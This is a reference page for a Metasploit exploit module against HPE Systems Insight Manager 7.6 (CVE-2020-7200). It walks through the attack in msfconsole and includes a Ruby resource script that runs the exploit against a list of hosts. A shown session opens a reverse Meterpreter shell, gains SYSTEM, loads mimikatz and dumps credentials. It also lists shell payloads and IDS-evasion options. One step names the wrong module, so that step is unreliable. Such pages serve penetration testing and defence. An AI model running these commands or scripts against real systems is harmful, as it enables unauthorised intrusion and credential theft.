HPE Systems Insight Manager AMF Deserialization RCE - Metasploit


This page contains detailed information about how to use the exploit/windows/http/hpe_sim_76_amf_deserialization metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: HPE Systems Insight Manager AMF Deserialization RCE
Module: exploit/windows/http/hpe_sim_76_amf_deserialization
Source code: modules/exploits/windows/http/hpe_sim_76_amf_deserialization.rb
Disclosure date: 2020-12-15
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888, 50000
List of CVEs: CVE-2020-7200

A remotely exploitable vulnerability exists within HPE System Insight Manager (SIM) version 7.6.x that can be leveraged by a remote unauthenticated attacker to execute code within the context of HPE System Insight Manager's hpsimsvc.exe process, which runs with administrative privileges. The vulnerability occurs due to a failure to validate data during the deserialization process when a user submits a POST request to the /simsearch/messagebroker/amfsecure page. This module exploits this vulnerability by leveraging an outdated copy of Commons Collection, namely 3.2.2, that ships with HPE SIM, to gain RCE as the administrative user running HPE SIM.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


Using hpe_sim_76_amf_deserialization against a single host

Normally, you can use exploit/windows/http/hpe_sim_76_amf_deserialization this way:

msf > use exploit/windows/http/hpe_sim_76_amf_deserialization
msf exploit(hpe_sim_76_amf_deserialization) > show targets
    ... a list of targets ...
msf exploit(hpe_sim_76_amf_deserialization) > set TARGET target-id
msf exploit(hpe_sim_76_amf_deserialization) > show options
    ... show and set options ...
msf exploit(hpe_sim_76_amf_deserialization) > exploit

Using hpe_sim_76_amf_deserialization against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your hpe_sim_76_amf_deserialization will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/windows/http/hpe_sim_76_amf_deserialization")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


A remotely exploitable vulnerability exists within HPE System Insight Manager (SIM) version 7.6.x that can be leveraged by a remote unauthenticated attacker to execute code within the context of HPE System Insight Manager's hpsimsvc.exe process, which runs with administrative privileges. The vulnerability occurs due to a failure to validate data during the deserialization process when a user submits a POST request to the /simsearch/messagebroker/amfsecure page.

This module exploits this vulnerability by leveraging an outdated copy of Commons Collection, namely 3.2.2, that ships with HPE SIM, to gain RCE as the administrative user running HPE SIM.

Installing HP SIM 7.6

  1. Set up a Windows Server 2016 VM.
  2. Sign up for a HP login if you do not have one already. You can use a throw away email address here.
  3. Download HPE SIM from https://myenterpriselicense.hpe.com/cwp-ui/download/swd/product/details/HPSIM-Win-7.x.
  4. Search for Turn Windows Features On or Off, select Role-based or feature-based installation, and click Next, until you see Select features.
  5. Check SNMP Service and .NET Framework 3.5 Features, and click Next, then Install. You may need to be connected to the internet to install .NET 3.5.
  6. Download SQL Server 2016 SP2 Express from https://www.microsoft.com/en-us/download/details.aspx?id=56840 and run the installer.
  7. Open Computer Management and then go to Computer Management (Local)->Services and Applications->SQL Server Configuration Manager->SQL Server Network Configuration->Protocols for SQLEXPRESS and double click on TCP/IP.
  8. Set Enabled to Yes under the Protocol tab.
  9. Click on the IP Addresses tab and set all TCP Dynamic Ports fields from 0 to an empty field, and set all TCP Port fields to 1433. Then click the Apply button.
  10. Restart the SQL service by running sc stop MSSQL$SQLEXPRESS and then after a few seconds, run sc start MSSQL$SQLEXPRESS
  11. Run the HPE SIM installer and when it gets to the Database Configuration page, it should default to Use SQL/SQL Express.
  12. Ensure at this point that the username is Administrator (or whatever the name of the administrative user you are installing as is), and the Domain and Host values are correct, and that the port is 1433.
  13. For the Password field, enter the password of the Administrator (or whatever the name of the administrative user you are installing as is), and click the Next button.
  14. Click Typical under the installation option and then select Next.
  15. On the Service Account Credentials screen, enter the password for the Administrative user and click Next. Then click Install.
  16. Wait for installation to complete, this could take up to 30 min.
  17. Verify that you can view https://127.0.0.1:50000/simsearch/messagebroker/amfsecure and that the page returns a HTTP 200 OK response code.

Verification Steps


  1. Install the application ensure port 50000 is open on the target and that the /simsearch/messagebroker/amfsecure page is accessible.
  2. Start msfconsole
  3. Do: use exploit/windows/http/sharepoint_data_deserialization
  4. Set the RHOSTS option.
  5. Set the TARGET option if desired.
  6. Set an appropriate payload for the PAYLOAD option.
  7. Set any additional options as required by the previously selected payload
  8. Run the exploit

Scenarios


SIM_7.6_Z7550-96287 on Server 2016

msf6 > use exploit/windows/http/hpe_sim_76_amf_deserialization
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/hpe_sim_76_amf_deserialization) > set RHOSTS 172.27.145.59
RHOSTS => 172.27.145.59
msf6 exploit(windows/http/hpe_sim_76_amf_deserialization) > set LHOST 172.27.150.115
LHOST => 172.27.150.115
msf6 exploit(windows/http/hpe_sim_76_amf_deserialization) > show options

Module options (exploit/windows/http/hpe_sim_76_amf_deserialization):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.27.145.59    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT      50000            yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the HPE SIM server
   VHOST                       no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.27.150.115   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows Powershell


msf6 exploit(windows/http/hpe_sim_76_amf_deserialization) > exploit

[*] Started reverse TCP handler on 172.27.150.115:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Target returned java.lang.NullPointerException in its 200 OK response!
[*] Sending stage (200262 bytes) to 172.27.145.59
[*] Meterpreter session 1 opened (172.27.150.115:4444 -> 172.27.145.59:53349) at 2021-03-08 16:04:52 -0600

meterpreter > getuid
Server username: WIN-QKA9JKS5MVU\Administrator
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeCreateTokenPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain           NTLM                              SHA1
--------       ------           ----                              ----
Administrator  WIN-QKA9JKS5MVU  *censored*                        *censored*

wdigest credentials
===================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
Administrator     WIN-QKA9JKS5MVU  (null)
WIN-QKA9JKS5MVU$  WORKGROUP        (null)

kerberos credentials
====================

Username                 Domain           Password
--------                 ------           --------
(null)                   (null)           (null)
Administrator            WIN-QKA9JKS5MVU  (null)
MSSQL$SQLEXPRESS         NT Service       (null)
SQLTELEMETRY$SQLEXPRESS  NT Service       (null)
win-qka9jks5mvu$         WORKGROUP        (null)


meterpreter >

Go back to menu.

Msfconsole Usage


Here is how the windows/http/hpe_sim_76_amf_deserialization exploit module looks in the msfconsole:

msf6 > use exploit/windows/http/hpe_sim_76_amf_deserialization

[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/hpe_sim_76_amf_deserialization) > show info

       Name: HPE Systems Insight Manager AMF Deserialization RCE
     Module: exploit/windows/http/hpe_sim_76_amf_deserialization
   Platform: Windows
       Arch: 
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-12-15

Provided by:
  Harrison Neal
  Jang
  Grant Willcox

Module side effects:
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Windows Command
  1   Windows Powershell

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      50000            yes       The target port (TCP)
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The base path to the HPE SIM server
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  A remotely exploitable vulnerability exists within HPE System 
  Insight Manager (SIM) version 7.6.x that can be leveraged by a 
  remote unauthenticated attacker to execute code within the context 
  of HPE System Insight Manager's hpsimsvc.exe process, which runs 
  with administrative privileges. The vulnerability occurs due to a 
  failure to validate data during the deserialization process when a 
  user submits a POST request to the 
  /simsearch/messagebroker/amfsecure page. This module exploits this 
  vulnerability by leveraging an outdated copy of Commons Collection, 
  namely 3.2.2, that ships with HPE SIM, to gain RCE as the 
  administrative user running HPE SIM.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2020-7200
  https://testbnull.medium.com/hpe-system-insight-manager-sim-amf-deserialization-lead-to-rce-cve-2020-7200-d49a9cf143c0
  https://www.zerodayinitiative.com/advisories/ZDI-20-1449/
  https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=hpesbgn04068en_us

Module Options


This is a complete list of options available in the windows/http/hpe_sim_76_amf_deserialization exploit:

msf6 exploit(windows/http/hpe_sim_76_amf_deserialization) > show options

Module options (exploit/windows/http/hpe_sim_76_amf_deserialization):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      50000            yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the HPE SIM server
   VHOST                       no        HTTP server virtual host

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Windows Powershell

Advanced Options


Here is a complete list of advanced options supported by the windows/http/hpe_sim_76_amf_deserialization exploit:

msf6 exploit(windows/http/hpe_sim_76_amf_deserialization) > show advanced

Module advanced options (exploit/windows/http/hpe_sim_76_amf_deserialization):

   Name                                    Current Setting                                     Required  Description
   ----                                    ---------------                                     --------  -----------
   AutoCheck                               true                                                no        Run check before exploit
   ContextInformationFile                                                                      no        The information file that contains context information
   DOMAIN                                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS                           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler                   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding                   false                                               no        Use transient context when encoding payloads
   FingerprintCheck                        true                                                no        Conduct a pre-exploit fingerprint verification
   ForceExploit                            false                                               no        Override check result
   HttpClientTimeout                                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace                               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors                         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly                    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                                no        The HTTP username to specify for authentication
   Powershell::encode_final_payload        false                                               yes       Encode final payload for -EncodedCommand
   Powershell::encode_inner_payload        false                                               yes       Encode inner payload for -EncodedCommand
   Powershell::exec_in_place               false                                               yes       Produce PSH without executable wrapper
   Powershell::exec_rc4                    false                                               yes       Encrypt PSH with RC4
   Powershell::method                      reflection                                          yes       Payload delivery method (Accepted: net, reflection, old, msil)
   Powershell::no_equals                   false                                               yes       Pad base64 until no "=" remains
   Powershell::noninteractive              true                                                yes       Execute powershell without interaction
   Powershell::persist                     false                                               yes       Run the payload in a loop
   Powershell::prepend_protections_bypass  true                                                yes       Prepend AMSI/SBL bypass
   Powershell::prepend_sleep                                                                   no        Prepend seconds of sleep
   Powershell::remove_comspec              false                                               yes       Produce script calling powershell directly
   Powershell::strip_comments              true                                                yes       Strip comments
   Powershell::strip_whitespace            false                                               yes       Strip whitespace
   Powershell::sub_funcs                   false                                               yes       Substitute function names
   Powershell::sub_vars                    true                                                yes       Substitute variable names
   Powershell::wrap_double_quotes          true                                                yes       Wraps the -Command argument in single quotes
   SSLVersion                              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2
                                                                                                         )
   UserAgent                               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                                   no        Specify the workspace for this module
   WfsDelay                                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (windows/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependMigrate               false            yes       Spawns and runs shellcode in new process
   PrependMigrateProc                            no        Process to spawn and run shellcode in
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the windows/http/hpe_sim_76_amf_deserialization module can exploit:

msf6 exploit(windows/http/hpe_sim_76_amf_deserialization) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Command
   1   Windows Powershell

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the windows/http/hpe_sim_76_amf_deserialization exploit:

msf6 exploit(windows/http/hpe_sim_76_amf_deserialization) > show payloads

Compatible Payloads
===================

   #   Name                                                Disclosure Date  Rank    Check  Description
   -   ----                                                ---------------  ----    -----  -----------
   0   payload/generic/custom                                               normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                                       normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                                    normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/windows/x64/exec                                             normal  No     Windows x64 Execute Command
   4   payload/windows/x64/loadlibrary                                      normal  No     Windows x64 LoadLibrary Path
   5   payload/windows/x64/messagebox                                       normal  No     Windows MessageBox x64
   6   payload/windows/x64/meterpreter/bind_ipv6_tcp                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
   7   payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
   8   payload/windows/x64/meterpreter/bind_named_pipe                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
   9   payload/windows/x64/meterpreter/bind_tcp                             normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
   10  payload/windows/x64/meterpreter/bind_tcp_rc4                         normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   11  payload/windows/x64/meterpreter/bind_tcp_uuid                        normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
   12  payload/windows/x64/meterpreter/reverse_http                         normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   13  payload/windows/x64/meterpreter/reverse_https                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   14  payload/windows/x64/meterpreter/reverse_named_pipe                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
   15  payload/windows/x64/meterpreter/reverse_tcp                          normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
   16  payload/windows/x64/meterpreter/reverse_tcp_rc4                      normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   17  payload/windows/x64/meterpreter/reverse_tcp_uuid                     normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
   18  payload/windows/x64/meterpreter/reverse_winhttp                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
   19  payload/windows/x64/meterpreter/reverse_winhttps                     normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
   20  payload/windows/x64/meterpreter_bind_named_pipe                      normal  No     Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
   21  payload/windows/x64/meterpreter_bind_tcp                             normal  No     Windows Meterpreter Shell, Bind TCP Inline (x64)
   22  payload/windows/x64/meterpreter_reverse_http                         normal  No     Windows Meterpreter Shell, Reverse HTTP Inline (x64)
   23  payload/windows/x64/meterpreter_reverse_https                        normal  No     Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
   24  payload/windows/x64/meterpreter_reverse_ipv6_tcp                     normal  No     Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
   25  payload/windows/x64/meterpreter_reverse_tcp                          normal  No     Windows Meterpreter Shell, Reverse TCP Inline x64
   26  payload/windows/x64/peinject/bind_ipv6_tcp                           normal  No     Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager
   27  payload/windows/x64/peinject/bind_ipv6_tcp_uuid                      normal  No     Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support
   28  payload/windows/x64/peinject/bind_named_pipe                         normal  No     Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager
   29  payload/windows/x64/peinject/bind_tcp                                normal  No     Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager
   30  payload/windows/x64/peinject/bind_tcp_rc4                            normal  No     Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   31  payload/windows/x64/peinject/bind_tcp_uuid                           normal  No     Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)
   32  payload/windows/x64/peinject/reverse_named_pipe                      normal  No     Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
   33  payload/windows/x64/peinject/reverse_tcp                             normal  No     Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager
   34  payload/windows/x64/peinject/reverse_tcp_rc4                         normal  No     Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   35  payload/windows/x64/peinject/reverse_tcp_uuid                        normal  No     Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)
   36  payload/windows/x64/pingback_reverse_tcp                             normal  No     Windows x64 Pingback, Reverse TCP Inline
   37  payload/windows/x64/powershell_bind_tcp                              normal  No     Windows Interactive Powershell Session, Bind TCP
   38  payload/windows/x64/powershell_reverse_tcp                           normal  No     Windows Interactive Powershell Session, Reverse TCP
   39  payload/windows/x64/shell/bind_ipv6_tcp                              normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
   40  payload/windows/x64/shell/bind_ipv6_tcp_uuid                         normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
   41  payload/windows/x64/shell/bind_named_pipe                            normal  No     Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
   42  payload/windows/x64/shell/bind_tcp                                   normal  No     Windows x64 Command Shell, Windows x64 Bind TCP Stager
   43  payload/windows/x64/shell/bind_tcp_rc4                               normal  No     Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   44  payload/windows/x64/shell/bind_tcp_uuid                              normal  No     Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
   45  payload/windows/x64/shell/reverse_tcp                                normal  No     Windows x64 Command Shell, Windows x64 Reverse TCP Stager
   46  payload/windows/x64/shell/reverse_tcp_rc4                            normal  No     Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   47  payload/windows/x64/shell/reverse_tcp_uuid                           normal  No     Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
   48  payload/windows/x64/shell_bind_tcp                                   normal  No     Windows x64 Command Shell, Bind TCP Inline
   49  payload/windows/x64/shell_reverse_tcp                                normal  No     Windows x64 Command Shell, Reverse TCP Inline
   50  payload/windows/x64/vncinject/bind_ipv6_tcp                          normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
   51  payload/windows/x64/vncinject/bind_ipv6_tcp_uuid                     normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
   52  payload/windows/x64/vncinject/bind_named_pipe                        normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
   53  payload/windows/x64/vncinject/bind_tcp                               normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
   54  payload/windows/x64/vncinject/bind_tcp_rc4                           normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   55  payload/windows/x64/vncinject/bind_tcp_uuid                          normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
   56  payload/windows/x64/vncinject/reverse_http                           normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   57  payload/windows/x64/vncinject/reverse_https                          normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   58  payload/windows/x64/vncinject/reverse_tcp                            normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
   59  payload/windows/x64/vncinject/reverse_tcp_rc4                        normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   60  payload/windows/x64/vncinject/reverse_tcp_uuid                       normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
   61  payload/windows/x64/vncinject/reverse_winhttp                        normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
   62  payload/windows/x64/vncinject/reverse_winhttps                       normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)

Evasion Options


Here is the full list of possible evasion options supported by the windows/http/hpe_sim_76_amf_deserialization exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(windows/http/hpe_sim_76_amf_deserialization) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
